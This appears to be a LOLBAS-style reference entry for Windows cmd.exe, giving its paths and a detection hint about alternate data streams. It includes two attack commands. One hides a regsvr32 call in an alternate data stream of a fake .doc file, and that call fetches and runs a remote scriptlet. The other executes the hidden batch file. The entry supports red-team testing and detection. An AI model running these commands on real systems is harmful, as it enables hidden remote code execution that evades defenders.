~/ cat Cmd.exe.md █
The command-line interpreter in Windows
Paths:
C:\Windows\System32\cmd.exe
C:\Windows\SysWOW64\cmd.exe
Detection: cmd.exe executing files from alternate data streams.
Alternate data streams
Add content to an Alternate Data Stream (ADS).
cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
Execute payload.bat stored in an Alternate Data Stream (ADS).
cmd.exe - < fakefile.doc:payload.bat